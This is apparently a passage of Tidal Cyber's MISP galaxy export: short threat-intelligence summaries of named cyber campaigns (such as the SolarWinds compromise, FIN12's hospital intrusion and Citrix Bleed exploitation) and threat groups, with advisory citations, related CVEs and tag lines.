The tag is: misp-galaxy:campaigns="Clop MOVEit Transfer Vulnerability Exploitation"

CostaRicto

[CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:campaigns="CostaRicto"

Defense Sector Supply Chain Compromise by North Korea-Linked Actors

German and South Korean cybersecurity authorities published an advisory highlighting recent attempts by North Korea-linked cyber actors to target enterprises and research centers in the defense sector. The advisory detailed a supply chain attack, attributed to an unnamed threat group, in which actors compromised a company that maintained a defense sector research center’s web servers, then used stolen SSH credentials to remotely access the research center’s network. The actors then used various methods to evade defenses, including impersonating security staff, deployed malware via a patch management system, and stole account information and email contents before being evicted from the network.<sup>[[BfV North Korea February 17 2024](/references/cc76be15-6d9d-40b2-b7f3-196bb0a7106a)]</sup>

The tag is: misp-galaxy:campaigns="Defense Sector Supply Chain Compromise by North Korea-Linked Actors"

FIN12 March 2023 Hospital Center Intrusion

In September 2023, French cybersecurity authorities released advisory CERTFR-2023-CTI-007, which detailed a network intrusion of the Regional and University Hospital Center of Brest, in northwestern France. Actors used valid credentials belonging to a healthcare professional to connect to a remote desktop service exposed to the Internet, then installed Cobalt Strike and SystemBC to provide backdoor network access. Authorities indicated that the credentials were likely compromised via unspecified infostealer malware.

The actors used multiple third-party tools for credential access and discovery, and they attempted to exploit at least five vulnerabilities for privilege escalation and lateral movement. Authorities worked with hospital personnel to isolate affected systems and disrupt the intrusion before suspected data exfiltration and encryption could take place. Based on infrastructural and behavioral overlaps with other incidents, officials attributed the intrusion to the FIN12 financially motivated actor group and indicated the same actors are responsible for dozens of attacks on French victims in recent years.

Additional details, indicators of compromise, and the observed Cobalt Strike configuration can be found in the [source report]([CERTFR-2023-CTI-007(/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

Related Vulnerabilities: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:campaigns="FIN12 March 2023 Hospital Center Intrusion"

Frankenstein

[Frankenstein](https://app.tidalcyber.com/campaigns/2fab9878-8aae-445a-86db-6b47b473f56b) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.<sup>[[Talos Frankenstein June 2019](https://app.tidalcyber.com/references/a6faa495-db01-43e8-9db3-d446570802bc)]</sup>

The tag is: misp-galaxy:campaigns="Frankenstein"

FunnyDream

[FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) backdoor and noted infrastructure overlap with the TAG-16 threat group.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup><sup>[[Kaspersky APT Trends Q1 2020](https://app.tidalcyber.com/references/23c91719-5ebe-4d03-8018-df1809fffd2f)]</sup><sup>[[Recorded Future Chinese Activity in Southeast Asia December 2021](https://app.tidalcyber.com/references/0809db3b-81a8-475d-920a-cb913b30f42e)]</sup>

The tag is: misp-galaxy:campaigns="FunnyDream"

Iranian APT Credential Harvesting & Cryptomining Activity

In November 2022, U.S. cybersecurity authorities released Cybersecurity Advisory AA22-320A, which detailed an incident response engagement at an unspecified U.S. Federal Civilian Executive Branch organization. Authorities assessed that the network compromise was carried out by unspecified Iranian government-sponsored advanced persistent threat (APT) actors. The actors achieved initial network access by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server. Post-exploit activities included installing XMRig crypto mining software and executing Mimikatz to harvest credentials, as well as moving laterally to the domain controller and implanting Ngrok reverse proxies on multiple hosts to maintain persistence.

Additional details, including incident response guidance and relevant mitigations, can be found in the [source report]([U.S. CISA Advisory November 25 2022(/references/daae1f54-8471-4620-82d5-023d04144acd)]</sup>

Related Vulnerabilities: CVE-2021-44228<sup>[[U.S. CISA Advisory November 25 2022](/references/daae1f54-8471-4620-82d5-023d04144acd)]</sup>

The tag is: misp-galaxy:campaigns="Iranian APT Credential Harvesting & Cryptomining Activity"

Iranian APT Targeting U.S. Voter Data

In November 2020, U.S. cybersecurity authorities released joint Cybersecurity Advisory AA20-304A, which detailed efforts by an unspecified Iranian advanced persistent threat (APT) actor to target U.S. state websites, including election-related sites, with the goal of obtaining voter registration data. The actors used a legitimate vulnerability scanner, Acunetix, to scan state election websites, and they attempted to exploit sites with directory traversal, SQL injection, and web shell upload attacks. Authorities confirmed the actors successfully obtained voter registration data in at least one state – after abusing a website misconfiguration, they used a cURL-based scripting tool to iterate through and retrieve voter records. Officials assessed that the actor behind the website attacks is responsible for mass dissemination of intimidation emails to U.S. citizens and a disinformation campaign featuring a U.S. election-related propaganda video in mid-October 2020. Authorities furthermore assessed that information obtained during the website attacks was featured in the propaganda video.<sup>[[U.S. CISA Iran Voter Data November 3 2020](/references/be89be75-c33f-4c58-8bf0-979c1debaad7)]</sup>

The tag is: misp-galaxy:campaigns="Iranian APT Targeting U.S. Voter Data"

Iranian IRGC Data Extortion Operations

In September 2022, U.S., Canadian, United Kingdom, and Australian cybersecurity authorities released joint Cybersecurity Advisory AA22-257A, which detailed malicious cyber activity attributed to advanced persistent threat (APT) actors affiliated with the Iranian government’s Islamic Revolutionary Guard Corps (IRGC). The advisory updated a previous alert (AA21-321A), published in November 2021, and summarized recent activities linked to the actors. Since at least March 2021, the actors were observed targeting victims in a wide range of U.S. critical infrastructure sectors, including transportation and healthcare, and victims in unspecified sectors in Australia, Canada, and the United Kingdom.

The actors typically exploited vulnerabilities to gain initial network access. They were observed exploiting vulnerabilities in Microsoft Exchange servers (ProxyShell) and Fortinet devices in 2021, and VMware Horizon (Log4j) in 2022. After gaining access, the actors typically evaluated the perceived value of data held within a victim network and either encrypted it for ransom and/or exfiltrated it. The actors are believed to have sold some exfiltrated data or used it as leverage to further pressure victims into paying a ransom.

In addition to behavioral observations and indicators of compromise, the advisories provided detection and mitigation guidance, which can be found in the source reports [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a) and [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a).

Related Vulnerabilities: CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105<sup>[[U.S. CISA IRGC Actors September 14 2022](/references/728b20b0-f702-4dbe-afea-50270648a3a2)]</sup>, CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591<sup>[[U.S. CISA Iranian Government Actors November 19 2021](/references/d7014279-bc6a-43d4-953a-a6bc1d97a13b)]</sup>

The tag is: misp-galaxy:campaigns="Iranian IRGC Data Extortion Operations"

Ivanti Gateway Vulnerability Exploits

This object represents a collection of MITRE ATT&CK® Techniques and other objects (Groups and/or Software) related to joint Cybersecurity Advisory AA24-060B, which detailed recent exploits of vulnerabilities (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) affecting Ivanti Connect Secure and Policy Secure VPN and gateway appliances by unspecified threat actors. Further background & contextual details can be found in the References tab below.

The tag is: misp-galaxy:campaigns="Ivanti Gateway Vulnerability Exploits"

June 2023 Citrix Vulnerability Exploitation

In July 2023, U.S. Cybersecurity & Infrastructure Security Agency authorities released Cybersecurity Advisory AA23-201A, which detailed an observed exploit of a zero-day vulnerability (CVE-2023-3519) affecting NetScaler (formerly Citrix) Application Delivery Controller ("ADC") and NetScaler Gateway appliances. According to the Advisory, the exploitation activity occurred in June 2023, and the victim (an undisclosed entity in the critical infrastructure sector) reported it in July 2023.<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup> Citrix acknowledged the reported exploit of the vulnerability, which enables unauthenticated remote code execution, and released a patch on July 18, 2023.<sup>[[Citrix Bulletin CVE-2023-3519](/references/245ef1b7-778d-4df2-99a9-b51c95c57580)]</sup>

After achieving initial access via exploit of CVE-2023-3519, threat actors dropped a web shell on the vulnerable ADC appliance, which was present on a non-production environment. The web shell enabled subsequent information discovery on the victim’s Active Directory ("AD"), followed by collection and exfiltration of AD-related data. The actors also attempted lateral movement to a domain controller, but the Advisory indicated that network segementation controls for the ADC appliance blocked this attempted activity.<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup> Separately, in a blog on CVE-2023-3519 exploit investigations released the day after the CISA Advisory, Mandiant indicated that the type of activity observed is "consistent with previous operations by China-nexus actors".<sup>[[Mandiant CVE-2023-3519 Exploitation](/references/4404ed65-3020-453d-8c51-2885018ba03b)]</sup>

Related Vulnerabilities: CVE-2023-3519<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup>

The tag is: misp-galaxy:campaigns="June 2023 Citrix Vulnerability Exploitation"

LockBit Affiliate Citrix Bleed Exploits

In November 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-325A, which detailed observed exploitation of CVE-2023-4966 (known colloquially as the “Citrix Bleed” vulnerability) by threat actors believed to be affiliated with the LockBit ransomware operation.

Citrix Bleed is a vulnerability in Citrix NetScaler web application delivery control (“ADC”) and NetScaler Gateway appliances, which allows adversaries to bypass password requirements and multifactor authentication, enabling hijacking of legitimate user sessions and subsequent credential harvesting, lateral movement, and data or resource access. Authorities indicated that they expected “widespread” Citrix Bleed exploitation on unpatched services due to the ease of carrying out the exploit.

After successful Citrix Bleed exploitation, LockBit affiliates were observed using a variety of follow-on TTPs and using a range of software, including abuse of native utilities and popular legitimate remote management and monitoring (“RMM”) tools. Indicators of compromise associated with recent intrusions and further incident response and mitigation guidance can be found in the [source report]([U.S. CISA LockBit Citrix Bleed November 21 2023(/references/21f56e0c-9605-4fbb-9cb1-f868ba6eb053)]</sup> Public reporting suggested that actors associated with the Medusa and Qilin ransomware operations, plus other unknown ransomware and uncategorized actors, had also exploited Citrix Bleed as part of their operations.<sup>[[Malwarebytes Citrix Bleed November 24 2023](/references/fdc86cea-0015-48d1-934f-b22244de6306)]</sup><sup>[[Cybernews Yanfeng Qilin November 2023](/references/93c89ca5-1863-4ee2-9fff-258f94f655c4)]</sup>

The tag is: misp-galaxy:campaigns="LockBit Affiliate Citrix Bleed Exploits"

Night Dragon

[Night Dragon](https://app.tidalcyber.com/campaigns/85f136b3-d5a3-4c4c-a37c-40e4418dc989) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.<sup>[[McAfee Night Dragon](https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]</sup>

The tag is: misp-galaxy:campaigns="Night Dragon"

Operation CuckooBees

[Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was conducted by actors affiliated with [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), and BARIUM.<sup>[[Cybereason OperationCuckooBees May 2022](https://app.tidalcyber.com/references/fe3e2c7e-2287-406c-b717-cf7721b5843a)]</sup>

The tag is: misp-galaxy:campaigns="Operation CuckooBees"

Operation Dream Job

[Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) was a cyber espionage operation likely conducted by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) as an umbrella term covering both Operation Interception and Operation North Star.<sup>[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)]</sup><sup>[[McAfee Lazarus Jul 2020](https://app.tidalcyber.com/references/43581a7d-d71a-4121-abb6-127483a49d12)]</sup><sup>[[ESET Lazarus Jun 2020](https://app.tidalcyber.com/references/b16a0141-dea3-4b34-8279-7bc1ce3d7052)]</sup><sup>[[The Hacker News Lazarus Aug 2022](https://app.tidalcyber.com/references/8ae38830-1547-5cc1-83a4-87c3a7c82aa6)]</sup>

The tag is: misp-galaxy:campaigns="Operation Dream Job"

Operation Dust Storm

[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan’s critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

The tag is: misp-galaxy:campaigns="Operation Dust Storm"

Operation Ghost

[Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867) was an [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867), [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.<sup>[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]</sup>

The tag is: misp-galaxy:campaigns="Operation Ghost"

Operation Honeybee

[Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.<sup>[[McAfee Honeybee](https://app.tidalcyber.com/references/e6f0f7b5-01fe-437f-a9c9-2ea054e7d69d)]</sup>

The tag is: misp-galaxy:campaigns="Operation Honeybee"

Operation Sharpshooter

[Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) operations, including fake job recruitment lures and shared malware code.<sup>[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)]</sup><sup>[[Bleeping Computer Op Sharpshooter March 2019](https://app.tidalcyber.com/references/84430646-6568-4288-8710-2827692a8862)]</sup><sup>[[Threatpost New Op Sharpshooter Data March 2019](https://app.tidalcyber.com/references/2361b5b1-3a01-4d77-99c6-261f444a498e)]</sup>

The tag is: misp-galaxy:campaigns="Operation Sharpshooter"

Operation Spalax

[Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267), however identified enough differences to report this as separate, unattributed activity.<sup>[[ESET Operation Spalax Jan 2021](https://app.tidalcyber.com/references/b699dd10-7d3f-4542-bf8a-b3f0c747bd0e)]</sup>

The tag is: misp-galaxy:campaigns="Operation Spalax"

Operation Wocao

[Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

Security researchers assessed the [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:campaigns="Operation Wocao"

PaperCut Vulnerability Exploitation

In May 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) authorities released Cybersecurity Advisory AA23-131A, which detailed observed exploits of a vulnerability, CVE-2023-27350, affecting certain versions of PaperCut NG and PaperCut MF, software applications for print management. PaperCut released a patch for the vulnerability in March 2023.<sup>[[PaperCut MF/NG vulnerability bulletin](/references/d6e71b45-fc91-40f4-8201-2186994ae42a)]</sup> According to the Advisory, authorities observed unspecified threat actors exploiting the vulnerability in mid-April 2023, followed by exploitation by the self-identified Bl00dy Ransomware Gang the following month.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

CVE-2023-27350 allows a remote actor to bypass authentication and remotely execute code on servers running affected versions of PaperCut software. In May, U.S. authorities observed Bl00dy Ransomware Gang actors exploiting the vulnerability to achieve initial access into education sector entities' networks and ingressing both legitimate remote management and maintenance (RMM) tools and several other command and control-related malware, including Lizar, Truebot, and Cobalt Strike. In some cases, the actors ultimately exfiltrated victim data and encrypted files, demanding payment in order to decrypt affected systems (the Advisory did not indicate how precisely actors encrypted data). The Advisory indicated that the "Education Facilities Subsector" maintains nearly 70% of exposed (but not necessarily vulnerable) U.S.-based PaperCut servers.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The Advisory instructed defenders to focus CVE-2023-27350 detection efforts on three areas: network traffic signatures, system monitoring, and server settings and log files. More details and resources for detection can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a).

Related Vulnerabilities: CVE-2023-27350<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:campaigns="PaperCut Vulnerability Exploitation"

Pikabot Distribution Campaigns 2023

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

This is a single object to represent the initial access and delivery methods observed with Pikabot distribution in the first year after its discovery. Distribution campaigns have been linked to the TA577 threat actor (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike)<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup><sup>[[Unit42 Malware Roundup December 29 2023](/references/a18e19b5-9046-4c2c-bd94-2cd5061064bf)]</sup>; however, the Technique- and Procedure level intelligence associated with these campaigns that is provided below was not explicitly linked to that group, so we are providing this intelligence to users in this Campaign form. The Water Curupira intrusion set (affiliated with the Black Basta ransomware operation) has also been observed distributing Pikabot.<sup>[[Trend Micro Pikabot January 9 2024](/references/dc7d882b-4e83-42da-8e2f-f557b675930a)]</sup>

The tag is: misp-galaxy:campaigns="Pikabot Distribution Campaigns 2023"

SolarWinds Compromise

The [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) was a sophisticated supply chain cyber operation conducted by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered in mid-December 2020. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.<sup>[[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)]</sup><sup>[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)]</sup><sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup><sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup><sup>[[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)]</sup><sup>[[Microsoft Internal Solorigate Investigation Blog](https://app.tidalcyber.com/references/66cade99-0040-464c-98a6-bba57719f0a4)]</sup>

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to Russia’s Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.<sup>[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)]</sup><sup>[[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)]</sup><sup>[[Mandiant UNC2452 APT29 April 2022](https://app.tidalcyber.com/references/5276508c-6792-56be-b757-e4b495ef6c37)]</sup> The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much smaller number were compromised by follow-on [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity on their systems.<sup>[[USG Joint Statement SolarWinds January 2021](https://app.tidalcyber.com/references/336a6549-a95d-5763-bbaf-5ef0d3141800)]</sup>

The tag is: misp-galaxy:campaigns="SolarWinds Compromise"

Tidal Groups

Tidal Groups Galaxy.

Tidal Groups is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

admin@338

[admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3), as well as some non-public backdoors. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:groups="admin@338"

Operation Woolen-Goldfish - Associated Group

Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and the campaign Operation Woolen-Goldfish.<sup>[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)]</sup><sup>[[TrendMicro Operation Woolen Goldfish March 2015](https://app.tidalcyber.com/references/0f077c93-aeda-4c95-9996-c52812a31267)]</sup>

The tag is: misp-galaxy:groups="Operation Woolen-Goldfish - Associated Group"

AjaxTM - Associated Group

<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="AjaxTM - Associated Group"

Flying Kitten - Associated Group

The tag is: misp-galaxy:groups="Flying Kitten - Associated Group"

Operation Saffron Rose - Associated Group

<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="Operation Saffron Rose - Associated Group"

Rocket Kitten - Associated Group

Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and Rocket Kitten.<sup>[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)]</sup><sup>[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]</sup>

The tag is: misp-galaxy:groups="Rocket Kitten - Associated Group"

Ajax Security Team

[Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.<sup>[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]</sup>

The tag is: misp-galaxy:groups="Ajax Security Team"

Silent Chollima - Associated Group

<sup>[[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]</sup>

The tag is: misp-galaxy:groups="Silent Chollima - Associated Group"

Andariel

